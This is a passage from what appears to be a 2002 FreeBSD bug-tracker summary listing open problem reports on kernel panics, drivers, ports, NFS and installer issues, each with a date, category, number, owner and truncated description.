(2) a [2002/05/26] gnu/38594 Fortan program don't link post gcc-3.1 o [2002/05/28] misc/38672 ifconfig+alias o [2002/05/28] bin/38676 change request for pw command o [2002/05/29] i386/38698 Kernel panics when filesystem with snapsh o [2002/05/30] misc/38748 FreeBSD 4.5 Keyboard problem cannot insta o [2002/05/31] i386/38775 Kernel panic with ATA raid o [2002/06/02] kern/38840 when i pass data over my dialup connectio o [2002/06/03] kern/38848 kernel panic when removing memory stick f o [2002/06/03] misc/38867 Boot "Read error" with offboard Promise u o [2002/06/03] kern/38872 nfs code ignores possibility of MGET(M_WA o [2002/06/04] kern/38909 kernel panic in lockmgr...with invalid pi o [2002/06/06] i386/38944 problems with ed-driver and dlink dfe-650 o [2002/06/07] ports/39008 dwhite py-kqueue wrapper broken with python 2.2 o [2002/06/08] kern/39043 Corrupted files on a FAT32 partition f [2002/06/10] conf/39139 4.4 multi boot loader causes serious dam o [2002/06/11] ports/39152 dima acroread4 dumps core with linux7 o [2002/06/13] i386/39234 SMP 4.6-RC freezes during boot (Fujitsu-S o [2002/06/14] kern/39297 Have random panic somewhere near console o [2002/06/15] misc/39341 ppp + USB modem problem o [2002/06/15] misc/39346 kenv is in /usr/bin rather than in /bin - p [2002/06/16] misc/39377 freopen() in libc_r does not append o [2002/06/19] kern/39524 smbfs with nge NIC causes kernel panic o [2002/06/19] i386/39548 sos ata problems with FreeBSD 4.6 o [2002/06/19] kern/39553 FreeBSD-4.6 halt on SMP machine o [2002/06/19] alpha/39560 alpha unaligned access in wihap_input_data ( wi o [2002/06/20] i386/39586 "BTX halted" hile attempting 4.6 install o [2002/06/24] ports/39780 ports mcrypt port fails. Something about host o [2002/06/24] ports/39781 dirk pdflib (as part of mod_php4) doesn't comp o [2002/06/25] i386/39844 PANIC using mount -> atacontrol detach -> o [2002/06/29] kern/40003 Panic on boot w/4.6 and 4.6-stable from 6 f [2002/07/01] i386/40099 Jul 1 19:39:17 server /kernel: pid 77933 o [2002/07/05] bin/40215 NIS host search not terminate o [2002/07/07] kern/40320 Raid crashed o [2002/07/08] kern/40330 ATA no longer supports Asus A7V266-E Prom o [2002/07/08] ports/40339 tobez fix MASTER_SITES security/keychain o [2002/07/08] ports/40362 anholt ports/x11-fonts/XFree86-4-font100dpi fail o [2002/07/12] kern/40481 Kernel fault on detecting Mylex eXtreme R f [2002/07/13] misc/40542 FreeBSD 4.6 Fatal Traps o [2002/07/14] i386/40564 SMP kernel panic on Intel SE7500CW2 o [2002/07/14] misc/40575 Kern.flp boot floppy error o [2002/07/17] ports/40721 lioux graphics/avifile (v0.7.11.20020711,1) pac o [2002/07/18] kern/40723 Disabling multicast on vlan interface cau o [2002/07/22] kern/40893 www.vivirasturias.com/dmesg o [2002/07/24] i386/40965 Random root access to non-root users from o [2002/07/25] kern/40986 Boot problem, says can't load kernel o [2002/07/25] ports/40995 anholt Xfree-4.2.0-libraries have pthread-proble o [2002/07/27] ports/41050 ports Blender fails to start. o [2002/07/27] i386/41052 Fresh install on a Compaq ARMADA E500 say o [2002/07/27] ports/41057 ports WebMagick doesn't compile o [2002/07/27] kern/41065 time counters gives negative time, system o [2002/07/27] ports/41069 ports kdegames fails to build o [2002/07/29] kern/41114 ipfw2 + dummynet + bridge = kernel panic 247 problems total. Serious problems S Submitted Tracker Resp. Description ------------------------------------------------------------------------------- s [1996/12/30] kern/2325 quota.user enlarged, no boot on 2.2-BETA o [1997/02/07] kern/2690 asami When Using ccd in a mirror mode, file cre o [1997/02/19] kern/2768 ktrace(1) -i dumps corrupted trace data o [1997/02/20] bin/2785 wpaul callbootd uses an unitialized variable a [1997/04/01] bin/3170 sheldonh vi freaks and dump core if user doesn't e f [1997/05/04] i386/3502 mdodd Merge of if_ix* and if_ie* broke EE/16 su o [1997/05/06] bin/3524 imp rlogin doesn't read $HOSTALIASES for non- o [1997/06/28] misc/3980 peter access via NFS fails during mount-operati o [1997/07/02] kern/4012 peter 2.2-RELEASE/Digital UNIX NFSv3 0 length f f [1997/07/17] kern/4115 peter SunOS NFS file has wrong owner if creator o [1997/07/30] kern/4194 peter kernel pci driver for Digital 21041 Ether o [1997/08/12] kern/4284 paul le0 goes OACTIVE after some time o [1997/08/22] bin/4357 bug in adduser script causes duplicate UI s [1997/10/01] bin/4672 rdist does not do hard links right when t o [1997/10/16] kern/4782 dillon Under certain conditions, several krsh's o [1998/01/27] kern/5587 des session id gets dropped o [1998/02/28] kern/5877 bmilekic sb_cc counts control data as well as data a [1998/04/07] kern/6238 cg Sound-driver patch for MAD16 (OPTi 928,92 a [1998/05/06] bin/6536 peter pppd doesn't restore drainwait for tty s [1998/06/23] bin/7033 Same process notified multiple times o [1998/06/24] i386/7057 mdodd 3Com 3C509 locks up, or has >1000ms rtt u o [1998/07/12] i386/7266 yokota PSM detection failure with Linksys consol s [1998/08/10] kern/7556 sl_compress_init() will fail if called an f [1998/09/11] kern/7902 if_de doesn't properly recognize a "Magic o [1998/09/17] bin/7968 If /usr/libexec/yppwupdate DNE, rpc.yppas o [1998/09/30] gnu/8099 obrien [patch] some bugs in cpio f [1998/10/08] kern/8206 [patch] Unconected UDP socket declined, i o [1998/11/10] bin/8646 peter Implement rlogind -a option f [1998/11/20] kern/8778 gibbs Buslogic BT948 in 2 boxes upgraded from S f [1998/11/25] bin/8865 dwmalone syslogd hangs with serial console o [1998/11/29] conf/8903 dillon /etc/rc can do NFS mounts before the netw o [1998/12/21] kern/9163 adrian [patch] squid does not join a multicast g s [1999/01/07] bin/9379 pppd does not go through all interfaces l o [1999/01/13] kern/9478 assar support for running a script from kldload s [1999/02/06] kern/9927 gibbs the ahc driver doesn't correctly grok swi o [1999/02/15] kern/10107 dillon interlock situation with exec_map and a p f [1999/02/25] bin/10264 davidn passwd(1) tryis NIS even with `-l' switch o [1999/02/28] bin/10312 ken pciconf -l generates output incompatible o [1999/03/02] bin/10353 jon ypserv gets segmentation violation o [1999/03/09] bin/10510 Remote cvs botches commits on occassion o [1999/03/16] bin/10633 fenner [patch] tcpslice timezone problem and upd a [1999/03/24] kern/10778 ru "ipforward_rt" is not cleared when routin o [1999/03/30] kern/10870 eivind Kernel panic when writing to write-protec s [1999/04/08] misc/11024 getpwnam(3) uses incorrect #define to lim s [1999/04/28] conf/11376 NFS mount may be happening too soon in /e o [1999/05/03] kern/11462 imp CS network interface driver (for CS89XX b o [1999/05/04] kern/11490 yokota VESA+VM86+Splash == unstable system o [1999/05/05] kern/11507 imp CS89XX (i386/isa/if_cs.c) fails to proper o [1999/05/05] misc/11525 dwmalone [PATCH] Networking patches to increase # p [1999/05/07] gnu/11562 tar verification doesn't work o [1999/05/13] kern/11697 tegge Disk failure hangs system o [1999/05/18] i386/11773 yokota mouse works at setup time. Under X it go o [1999/05/28] kern/11922 deischen missing reentrant interfaces for getpwnam o [1999/07/07] kern/12551 mks ASIC output is shifted following a short o [1999/07/20] bin/12727 billf Game patches from NetBSD o [1999/08/14] kern/13141 se Multiple LUN support in NCR driver is bro o [1999/09/10] bin/13691 fenner tcpslice cannot extract over 2GB part of o [1999/09/13] kern/13740 jlemon wrong IP statistics s [1999/09/16] conf/13775 multi-user boot may hang in NIS environme s [1999/09/17] i386/13787 lnc driver isn't really the lnc driver o [1999/09/26] misc/13978 peter a write to last column bug appears since o [1999/09/27] kern/13997 rwatson RLIMIT_NPROC works unadequately for jails s [1999/10/04] i386/14135 lpt1 nolonger exists after 3.2-RELEASE o [1999/10/12] kern/14285 dillon NFS client appears to lose data o [1999/10/14] i386/14334 imp AHA-1542A not supported by FreeBSD 3.x (" o [1999/10/26] kern/14549 mdodd 3C509 broken in 3.3 o [1999/10/27] kern/14566 yokota Non-kernel programs have little/no contro a [1999/11/04] kern/14712 iedowse root has access to NFS mounted directorie s [1999/11/12] kern/14848 Frame Relay support, corrected a [1999/11/12] misc/14856 billf ftp stalls on FreeBSD 3.3 (CDROM) tested o [1999/11/17] i386/14946 mjacob rmt - remote magtape protocol s [1999/12/14] kern/15478 incorrect utmp/wtmp records update upon c o [1999/12/17] kern/15542 de suddenly stops working o [1999/12/23] misc/15662 markm [PATCH] perl5 Sys::Hostname fails if no P o [1999/12/26] kern/15707 dillon bad trap in mprotect o [2000/01/01] kern/15825 dillon Softupdates gets behind, runs the system s [2000/01/02] i386/15845 Driver for RealTek 8029 f [2000/01/03] bin/15877 tobez Perl 5.00503 interpreter crashes with a s o [2000/01/12] kern/16090 mdodd No buffer space available a [2000/01/22] kern/16299 tmm nfs.ko can be unloaded when nfsd is runni f [2000/01/24] ports/16343 reg bsd.port.mk cannot override make.conf. o [2000/02/08] kern/16587 cg Can't record with newpcm & CS4236 (AW35/P o [2000/02/10] kern/16644 Bad comparsion expression in bpf_filter.c o [2000/02/21] conf/16879 tanimura Sound drivers seem to be using shared irq o [2000/02/23] conf/16948 qa Sysinstall/disklabel: bad partition table o [2000/02/25] misc/16991 jhb booting install disk and USB s [2000/03/01] misc/17108 SecureRPC not supported in mount_nfs comm o [2000/03/10] misc/17310 wpaul NIS host name resolving may loop forever o [2000/03/16] kern/17422 bde 4.0-STABLE: top: nlist failed o [2000/03/20] kern/17504 ken Another Micropolis Synchronize Cache Prob f [2000/03/20] misc/17517 wpaul 100/10baseT card resets under load s [2000/03/21] conf/17540 NIS host lookups cause NFS mounts to wedg f [2000/03/21] kern/17542 greid random static with GUS PnP o [2000/03/24] misc/17584 groudier fatal SCSI error with a Symbios 53c875 co o [2000/03/27] i386/17626 green sshd cores when I scp to it o [2000/03/28] alpha/17637 billf misconfigured syscons bell causes panic o o [2000/03/29] i386/17662 gibbs cam_xpt.c incorrectly disables tagged que o [2000/03/31] i386/17713 gibbs MAKEDEV and /stand/sysinstall goofups wit o [2000/04/04] i386/17800 bde [PATCH] problem with statclock initializa f [2000/04/06] kern/17829 The dc driver is seriously broken f [2000/04/07] bin/17843 ftpd fails to set cwd with mode 700 NFS m f [2000/04/10] kern/17905 dillon 4.0-SNAP keep on crashing every 3 days o [2000/04/11] i386/17926 yokota psm device problems with apm resume o [2000/04/12] kern/17961 n_hibma Fatal Trap 12. Page fault while in kernel o [2000/04/12] kern/17965 silby vr (MII-bus version in 4.0 ONLY) driver l o [2000/04/14] kern/18012 adrian vnode_free_list corruption, "free vnode i o [2000/04/17] misc/18065 mdodd FREEBSD 4.0 crashes on boot Compaq Prolia s [2000/04/23] bin/18181 Getty can fail to observe :de: specificat f [2000/04/23] i386/18185 gibbs Adaptec 3950U2 errors during boot/probe o [2000/04/24] kern/18200 mdodd 3com 3c509b recognized twice during boot f [2000/04/25] kern/18209 green rlimits are never checked in exec() if ex f [2000/04/28] kern/18285 the system froze when use scon -s 50 o [2000/05/02] kern/18345 cg sbc / pcm not fully recognizing AWE64 o [2000/05/02] kern/18348 yokota tags o [2000/07/19] kern/20040 msmith Toshiba 2775 hangs after pcib0 driver is o [2000/07/25] misc/20172 byacc 1.9 fails to generate $default tran o [2000/07/27] kern/20234 green panic(): lockmgr: pid 259, not exclusive o [2000/07/29] conf/20282 qa sysinstall does not recover some /etc fil f [2000/07/31] kern/20335 yokota S3Trio64V+ is detected as CGA by syscons p [2000/08/02] bin/20373 Setting breakpoints in shared objects bro o [2000/08/08] ports/20490 tg Termios timeout parameters, VMIN, VTIME, f [2000/08/09] i386/20507 yokota Mouse freezes in 4.0-release after some u o [2000/08/10] misc/20521 mjacob /etc/rmt several problems o [2000/08/10] kern/20523 bde Support for PCI multiport cards for sio d o [2000/08/13] kern/20572 marcel cannot safely remove COMPAT_43 from the k o [2000/08/14] kern/20609 dillon panic: vm_fault: fault on nofault entry, o [2000/08/15] bin/20633 fdisk doesn't handle LBA correctly f [2000/08/17] kern/20689 groudier Newbusified version of ncr driver does no o [2000/08/18] kern/20708 imp Adaptec 1542 ISA SCSI Controller not dete f [2000/08/22] bin/20779 assar junk pointer error causes kpasswd to fail o [2000/08/26] misc/20861 libc_r does not honor socket timeouts o [2000/08/28] gnu/20912 mp gdb does not recognise old executables. f [2000/08/30] bin/20952 markm ftpd doesn't honor account expiration tim o [2000/08/31] kern/20958 mdodd ep0 lockup with ifconfig showing OACTIVE o [2000/09/07] misc/21089 vi silently corrupt open file on SIGINT w f [2000/09/08] kern/21139 ken IBM DNES drives need 'quirk table' entry. p [2000/09/11] bin/21208 tar does not support 2.5 GB file o [2000/09/11] kern/21209 groudier scsi ncr driver installs instead of scsi a [2000/09/13] bin/21248 kris openssl dumps core with blank passwords o [2000/09/14] gnu/21260 buffer overrun in uux o [2000/09/14] ports/21264 markm tn3270 port receives segmentation fault o [2000/09/14] gnu/21276 libI77 is unable to handle files >2Gbytes o [2000/09/15] kern/21304 wpaul dc0 watchdog timeouts on NetGear FA310TX o [2000/09/15] kern/21305 roger bktr driver dosn't send signals in contin s [2000/09/18] misc/21384 greid pcm driver has static in recorded audio o [2000/09/19] misc/21406 freebsd's bootinst or booteasy overwrites p [2000/09/20] gnu/21433 g++ optimiser produces bad code on right o [2000/09/21] kern/21461 imp ISA PnP resource allocator problem o [2000/09/21] kern/21463 emulationLinux compatability mode should not allow f [2000/09/27] bin/21603 green Can't change user passwords on 4.1.1-STAB o [2000/09/28] kern/21642 Compaq Netelligent 10/100 card (TI Thunde o [2000/10/02] docs/21708 jlemon kqueue/kevent man pages isn't specific ab o [2000/10/02] ports/21714 sobomax audio problem with nil o [2000/10/05] kern/21771 murray Fix for sppp and Cronyx drivers update a [2000/10/06] kern/21808 [patches] msdosfs incorrectly handles vno o [2000/10/15] misc/21998 green ident only for outgoing connections o [2000/10/19] kern/22142 securelevel does not affect mount o [2000/10/22] bin/22212 skeyaccess(3) doesn't for primary group o [2000/10/24] misc/22284 Change (SunOS) NIS passwd error o [2000/10/25] bin/22291 getcwd() fails on recently-modified NFS-m o [2000/10/30] kern/22417 gibbs advansys wide scsi driver does not suppor o [2000/10/31] i386/22441 pmap_growkernel() is not effective at ker o [2000/11/05] bin/22614 billf pam_ssh dumps core o [2000/11/05] kern/22624 Interrupt conflict btw. vga and Ethernet o [2000/11/06] gnu/22635 Why don't you use truncate(2) in libI77 o [2000/11/13] kern/22826 emulationMemory limits have no effect in linux com o [2000/11/14] bin/22846 Routed does not reflect preference of Int f [2000/11/15] kern/22862 ncr probe fails with CACHE TEST FAILED: ? o [2000/11/18] kern/22943 emulationProblem with linux emulation o [2000/11/18] i386/22944 isa_dmainit fails on machines with 512MB a [2000/11/18] kern/22947 jon IBM 10/100 EtherJet Cardbus (Xircom X3201 o [2000/11/23] gnu/23058 ncurses: tgoto_internal() ugliness o [2000/11/25] bin/23098 ambrisko If installing on a serial console, enable o [2000/11/26] ports/23125 mbr Successful emulation of StarOffice depend f [2000/11/30] conf/23192 FTP REALLY slow on internal NIC aswel (12 p [2000/11/30] bin/23203 opie doesn't know that ssh connections ar o [2000/12/04] bin/23269 green OpenSSH TIS Authentication support has br o [2000/12/07] bin/23352 [SECURITY] buffer overflow in opieftpd f [2000/12/07] misc/23364 gethostbyaddr takes longer or locks up an o [2000/12/08] kern/23400 rwatson IPsec transport mode precludes filtering o [2000/12/12] kern/23515 get error in messages system log "Dec 11 o [2000/12/13] kern/23535 imp 4.x kernels seem to no longer support Ada o [2000/12/14] misc/23561 emulationLinux compatibility mode does not support o [2000/12/18] ports/23638 kuriyama Add turbine-pool.jar to Cocoon CLASSPATH o [2000/12/22] kern/23771 bridge/firewall doesn't work as in bridge o [2000/12/26] bin/23866 dwmalone patch for pointing out current date o [2001/01/02] kern/24032 markm rndcontrol and pccardd use of interupt ha o [2001/01/03] kern/24059 n_hibma USB support broken in SMP kernel o [2001/01/04] kern/24070 n_hibma uhci USB driver disables port on reatachi o [2001/01/04] kern/24074 mdodd Properties of token-ring protocol must be f [2001/01/05] kern/24085 syncing on shutdown leaves filesystem dir o [2001/01/06] kern/24100 imp Having a 3c589 PCMCIA/PCCARD inserted pre o [2001/01/06] docs/24125 wes connect(2) can yield EWOULDBLOCK/EAGAIN f [2001/01/10] conf/24238 First physical interface always has IPv6 o [2001/01/12] bin/24271 dumpon should check its argument more o [2001/01/16] misc/24391 cannot kill amd after interface disappear o [2001/01/19] bin/24461 pirzyk Being able to increase the YP timeout wit o [2001/01/19] bin/24472 libc_r does not honor SO_SNDTIMEO/SO_RCVT s [2001/01/23] misc/24590 timezone function not compatible witn Sin o [2001/01/25] kern/24629 ng_socket failes to declare connected dat o [2001/01/25] bin/24632 libc_r delicate deviation from libc in ha o [2001/01/25] misc/24641 pthread_rwlock_rdlock can deadlock o [2001/01/28] bin/24691 map-mbone segfaults at getsockname o [2001/01/29] ports/24711 portmgr ${MAKEFILE} causing trouble with ports o [2001/01/30] i386/24737 Socks5 clients die with leaving zombie pr f [2001/02/06] i386/24916 SCSI timeout errors with adv0 driver (Adv o [2001/02/09] kern/24982 stack gap usage o [2001/02/10] i386/24997 /boot/loader cannot handle extended dos p o [2001/02/11] ports/25007 max telnetx problem on 4.x o [2001/02/12] kern/25038 murray dhcp client could not set hostname on boo o [2001/02/13] kern/25067 adrian able to mount a pathname > 80 char. but u o [2001/02/14] kern/25093 4.2-STABLE does not recognize PCNet-ISA+ a [2001/02/19] kern/25201 imp pccard event and syscons beep duration de o [2001/02/19] kern/25213 peter Bus abstraction interface doesn't allow p o [2001/02/21] kern/25248 bde sys/user.h needs sys/param.h, but doesn't f [2001/02/21] kern/25261 gibbs ahc0 no active SCB errors when booting of o [2001/02/21] ports/25272 rse Using eperl as cgi/nph binary executor ca s [2001/02/23] bin/25337 rwatson dmesg -a should be restricted o [2001/02/28] bin/25461 qa sysinstall's fdisk and disklabel don't wo o [2001/03/03] kern/25511 ioctl(fd, FIONREAD, &c) on a FIFO (not PI o [2001/03/05] bin/25542 /bin/sh: null char in quoted string o [2001/03/07] misc/25585 sed.test 8.16 puts bugged sed into infini o [2001/03/07] bin/25586 green Password expiration doesn't work after up o [2001/03/13] kern/25781 Statclocks cannot be disables on ServerWo o [2001/03/14] misc/25801 imp change IP-address on pccard (3Com) fails o [2001/03/15] bin/25826 nfsd -t -h adr1 -h adr2 doesn't work o [2001/03/16] misc/25851 qa Security hole in anonymous FTP setup scri o [2001/03/17] bin/25886 cgetset(3) doesn't get cleared when switc f [2001/03/18] i386/25889 FDISK lost a partition ! o [2001/03/19] bin/25929 Can't use MAKEDEV in fixit mount o [2001/03/20] kern/25949 msmith camcontrol doesn't find new drives or RAI o [2001/03/22] kern/25986 silby Socket would hang at LAST_ACK forever. o [2001/03/22] misc/26002 n_hibma Poor read/write performance on uhci USB c o [2001/03/22] kern/26013 Linksys (rev 3) USB 100TX NIC causes infi o [2001/03/23] ports/26036 dima acroread4 produces invalid postscript in o [2001/03/25] kern/26078 Jails cannot connect to the main server a o [2001/03/26] bin/26093 markm pam_unix rejects authenticating accounts o [2001/03/27] kern/26142 Unlink fails on NFS mounted filesystem o [2001/03/28] kern/26171 emulationnot work Linux-emulator, but hi is work i o [2001/03/31] i386/26261 silo overflow problem in sio driver o [2001/04/02] bin/26307 libc_r aborts when using the KDE media pl o [2001/04/03] kern/26309 PPPoE client panics in kernel - fxp probl o [2001/04/03] misc/26320 alfred mountd breaks IRIX automounter f [2001/04/04] kern/26356 Large copy of files to the machine causes a [2001/04/05] gnu/26362 "cvs server" doesn't honour the global -- o [2001/04/06] kern/26384 dc driver hangs in dc_rxeof o [2001/04/08] kern/26430 cg -CURRENT panics on cat /dev/dsp or cat /d o [2001/04/09] ports/26464 mbr Citrix client no longer reads files in lo o [2001/04/10] misc/26486 setnetgrent hangs when netgroup contains o [2001/04/12] kern/26506 phk sendto() syscall returns EINVAL in jail e o [2001/04/14] kern/26567 Mouse driver will not properly restart if o [2001/04/14] kern/26568 Mouse driver will die if you move mouse a o [2001/04/19] kern/26704 AHA-2940[UW] gives MPARERR on cold boot ( o [2001/04/23] ports/26797 assar arla-0.34.6 causes kernel panic/page faul o [2001/04/23] bin/26809 /etc not saved on upgrade o [2001/04/25] bin/26842 dd dump with h flag takes a very long time o [2001/04/25] ports/26848 sobomax jre port core dumps a [2001/04/25] bin/26869 sheldonh vi(1) crashes in viewing a file with long o [2001/04/27] misc/26897 qa 4.3R sysinstall fails to create swap part f [2001/04/29] kern/26953 adter the installation is over it's make o [2001/04/30] bin/26996 green sshd fails when / mounted read-only f [2001/05/01] kern/27020 FreeBSD 4.3RC compiled with an SMP kernel o [2001/05/02] ports/27052 portmgr libtool port broken in 4.3 RELEASE o [2001/05/04] bin/27086 green OpenSSH does not set X11 forwarding a [2001/05/08] ports/27202 dougb mail/pine sucks rocks when saving over NF o [2001/05/09] bin/27230 nectar Users after NIS lines in /etc/passwd o [2001/05/09] kern/27237 silby Watchdog Timeouts under EXCESSIVE load o [2001/05/09] kern/27242 SIGHUP propagation failure to processes o o [2001/05/10] i386/27247 Panic on install - "page fault syncing di a [2001/05/10] kern/27262 process won't be terminated after CPUTIME o [2001/05/16] misc/27400 4.3 install hangs because it is looking f o [2001/05/17] ports/27419 ports E-FancyLauncer clones itself over and ove o [2001/05/20] kern/27474 Interactive use of user PPP and ipfilter o [2001/05/21] misc/27498 grog vinum crashed after 'vinum dumpconfig' o [2001/05/21] kern/27522 des linprocfs:/proc/stat does not handle SMP o [2001/05/22] kern/27543 des /proc/cpuinfo does not handle SMP hosts o [2001/05/23] docs/27605 doc Cross-document references () o [2001/05/27] kern/27694 cg Panic in csa(4) f [2001/05/29] i386/27729 qa the ls120 device "afd" does not show up u o [2001/06/04] ports/27875 ports invoked on boot, SIGHUP is delivered and a [2001/06/05] misc/27893 sos can't burn audio cds on LG CD-RW CED-8083 o [2001/06/05] misc/27896 Error in /etc/exports invalidates entire o [2001/06/07] ports/27925 portmgr index is not updated when it html manpage o [2001/06/07] ports/27926 portmgr bsd.port.mk does not handle MLINKS with h o [2001/06/09] bin/27988 [PATCH] let pam_ssh.so explicitly start s o [2001/06/09] kern/27995 src/sys/pci if_pcn.c revision 1.21 resp. o [2001/06/12] misc/28095 [PATCH] pax may descend into directories o [2001/06/12] kern/28100 Hang after device probe on EISA machine o [2001/06/12] ports/28102 assar Recent changes to 4.3-STABLE break arla-0 o [2001/06/14] ports/28155 portmgr DESTDIR is used incorrectly in bsd.port.m o [2001/06/15] kern/28173 Problem with Touchpad on Inspiron 5000e o [2001/06/15] misc/28188 Cron is being started to early in /etc/rc o [2001/06/16] kern/28218 A peer of TCP socket cannot detect termin o [2001/06/16] bin/28221 eric dialog(1) segfaults (due to the bug in li o [2001/06/17] bin/28223 su doesn't look at login.conf all the tim o [2001/06/17] bin/28224 ftpd doesn't honor invalid shelll in logi o [2001/06/17] i386/28231 /boot/loader can't load kernel on Xyberna o [2001/06/20] bin/28311 markm ftpd and sshd do not honor expired pw ent o [2001/06/23] ports/28378 jedgar p5-Net-IRC-0.70_1 eats irc text with col o [2001/06/24] ports/28398 ports ja-dvips cannot find tex.pro o [2001/06/25] kern/28417 arplookup uses potentially unprotected st o [2001/06/26] bin/28424 mtree fails to report directory hierarchy o [2001/06/26] kern/28434 cs0's promiscuous mode does not work o [2001/06/27] misc/28442 hot rebuild on Compaq Intergrated Smart A o [2001/06/28] ports/28491 kiri www/w3-4 port: mismatch between pkg-plist f [2001/06/28] kern/28497 dmesg corrupted buffer/output o [2001/06/29] misc/28508 problems with backup to Tandberg SLR40 st o [2001/06/30] i386/28536 writing to corrupted msdosfs causes kerne f [2001/06/30] bin/28552 EUC support of wcstombs(3) is broken for o [2001/07/01] i386/28592 Please support boot from ATA RAID-0 devic o [2001/07/04] kern/28692 cg ICH sound driver hangs kernel o [2001/07/04] kern/28713 luigi NEW IPFW FEATURE [PATCHES]: Dynamic rule o [2001/07/06] kern/28768 The system doesn't get connects on one of o [2001/07/06] bin/28773 [PATCH] Bug in pw, no $ in username o [2001/07/07] bin/28798 mikeh mail(1) with a pager (more) requires fg/C o [2001/07/07] i386/28802 3com Performance Pro modem conflicts with o [2001/07/09] kern/28840 gibbs Possible interrupt masking trouble in sys o [2001/07/09] bin/28852 cracauer behavior of /bin/sh with -e option looks o [2001/07/09] kern/28856 3COM PCI FaxModem with shared IRQ causes o [2001/07/11] ports/28889 lioux qpopper-4.0.3 error: Insufficient room to o [2001/07/12] i386/28928 wpaul dual starfire nic doesn't seem to work (a o [2001/07/13] bin/28935 dwmalone syslogd -u doesn't treat * as "all levels f [2001/07/15] i386/28985 Installing FreeBSD 4.3 on a Dell Optiplex o [2001/07/16] bin/29026 traceroute -s option allows any IP addres o [2001/07/17] bin/29049 green multi-user with star o [2001/09/15] misc/30590 /etc/hosts.equiv and ~/.rhosts interactio o [2001/09/15] kern/30592 roam [PATCH] panic: static sysctl oid too high o [2001/09/17] kern/30630 fenner Failure to check for existence of interfa o [2001/09/18] bin/30654 Added ability for newsyslog to archive lo o [2001/09/21] misc/30708 DHCP and multiple interfaces o [2001/09/21] kern/30712 fatal kernel trap during ufs_rename o [2001/09/21] ports/30728 portmgr pkg_add causes install of multiple versio o [2001/09/23] kern/30755 It is impossible to mount CD-ROM in some o [2001/09/23] ports/30767 anholt silly links break XFree-4 port if /usr/X1 o [2001/09/24] kern/30798 contigfree() doesn't o [2001/09/25] kern/30820 sound PCM sound fails o [2001/09/25] ports/30823 ports New port: KinterbasDB, Python module to a o [2001/09/26] bin/30837 Sysinstall doesn't set the schg flag on t o [2001/09/30] ports/30947 ports mail/mahogany fails to build, conflicts w o [2001/09/30] kern/30948 ls'ing mounted brand new floppy locks up o [2001/09/30] kern/30952 kernel panics with 3C905[BC] cards / xl d o [2001/10/01] kern/30958 QUOTA with 0 bytes in quota.user hangs up o [2001/10/01] bin/30959 newfs -i x dumps core for small values of f [2001/10/01] bin/30966 fenner TCPdump repeating on Radius accounting pa o [2001/10/01] kern/30971 peter NFS client modification time resolution i o [2001/10/02] i386/30991 pcm in PNP-OS mode vs. non-PNP-OS mode po o [2001/10/02] bin/30993 xxgdb cannot open source file o [2001/10/04] bin/31029 cjc syslogd remote logging back down o [2001/10/04] i386/31035 Smart Array & SMP hangs on Proliant 1600 o [2001/10/04] bin/31045 routed dumps core o [2001/10/04] kern/31046 Linux OpenGL programs do not work under t o [2001/10/04] kern/31047 Linux programs do not dump core in linux o [2001/10/06] kern/31084 imp xe driver device probe fails in CIS tuple o [2001/10/06] kern/31085 kernel panic on tftp only pxeboot o [2001/10/07] kern/31102 lge + Pentium III data transmission probl o [2001/10/07] kern/31103 nfs read i/o error when nfs-mounting onto o [2001/10/07] ports/31113 portmgr bsd.ports.subdir.mk: remove NOCLEANDEPEND o [2001/10/08] kern/31147 Kernel panics (double fault) in some "net o [2001/10/09] ports/31184 ports Latex2html problem o [2001/10/10] ports/31191 ports netsaint - plugins sometimes not found o [2001/10/10] kern/31203 imp Cardbus xl driver broken on -CURRENT o [2001/10/11] ports/31216 znerd New port: devel/plist-builder o [2001/10/12] kern/31238 `hpijs' process hangs unkillably in `devb o [2001/10/14] conf/31280 gshapiro /etc/rc.network NFS server startup broken o [2001/10/15] bin/31306 qa sysinstall fails to create non-root parti o [2001/10/17] bin/31339 make's .if processing buggy o [2001/10/18] misc/31363 sysinstall "partition editor" silently co o [2001/10/21] kern/31398 cg newpcm does not play back the tail of sou f [2001/10/21] ports/31422 ache Does pkg_delete have to erase /usr/local/ f [2001/10/24] kern/31471 Specific IPFW's FWD rule crashes the kern o [2001/10/24] i386/31481 FreeBSD does Not find disk drives with Co o [2001/10/25] kern/31492 Panic in sysctl_remove_oid. o [2001/10/25] ports/31494 ache mod_perl fixes for apache13 port o [2001/10/26] ports/31511 obrien g++30 produces binaries which SIGBUS when o [2001/10/26] kern/31515 Use of USB Keyboard crashes 4.4 during in o [2001/10/30] conf/31631 "MAC address" can't be acquired properly. o [2001/10/31] kern/31659 n_hibma USB controller driver will die after some o [2001/10/31] bin/31661 pthread_kill signal handler doesn't get s f [2001/10/31] misc/31670 Wide-Ultra 10k SCSI 3 drive is not recogn o [2001/10/31] bin/31678 A bug in handling an error reading a CD-R f [2001/11/01] ports/31689 znerd JDK 1.3.1 update for FreeBSD/Java Commapi f [2001/11/01] bin/31692 2872-or-less-byte ftp binary transfer fro o [2001/11/01] ports/31699 ports The graphics/gd2 port conflicts with grap o [2001/11/03] kern/31746 failed connect(2) seems to cause problems f [2001/11/05] kern/31768 darrenr Use of fastroute in IPFilter reboots the o [2001/11/05] i386/31771 brian PPP compares CHAP81 response case sensiti o [2001/11/05] kern/31790 problem with NFS and jail() o [2001/11/05] ports/31793 kuriyama snmpd loops on udp.ipv6UdpTable.ipv6UdpEn o [2001/11/06] kern/31804 Clearing PME mode kills network performan o [2001/11/07] ports/31819 jmz ports/ispell install doesn't work o [2001/11/07] bin/31835 murray dhclient doesn't close FD's before spawni o [2001/11/07] bin/31837 qa sysinstall change mountpoint o [2001/11/07] kern/31839 mdodd ex0 panic if NIC not cabled a [2001/11/07] ports/31840 portmgr package naming inadequation (gnome vs gtk o [2001/11/07] i386/31845 Toshiba Satellite 2105CDS won't boot Free o [2001/11/08] bin/31860 read wont timeout on sockets if using thr o [2001/11/08] misc/31864 system header file attempts to redefine a o [2001/11/09] ports/31893 des gnats-3.113.1 conflicts with /usr/bin/sen p [2001/11/12] gnu/31929 GNU Tar shipped with FreeBSD handles rela o [2001/11/12] kern/31940 nge gigabit adapter link reset and slow t o [2001/11/13] i386/31967 reboot/shutdown hangs on Sony VAIO 505 w/ o [2001/11/14] kern/31979 Setup and boot locks Compaq Armada E500 l f [2001/11/17] ports/32063 znerd patch for /usr/ports/java/linux-jdk about o [2001/11/17] bin/32072 setuid w/o immutable flag o [2001/11/18] kern/32098 semctl() does not propagate permissions o [2001/11/19] kern/32118 21143 with dc driver will not select 10ba o [2001/11/19] ports/32121 anholt xf86cfg 4.1.0 writes bad "Chipset" value o [2001/11/20] kern/32124 Cannot 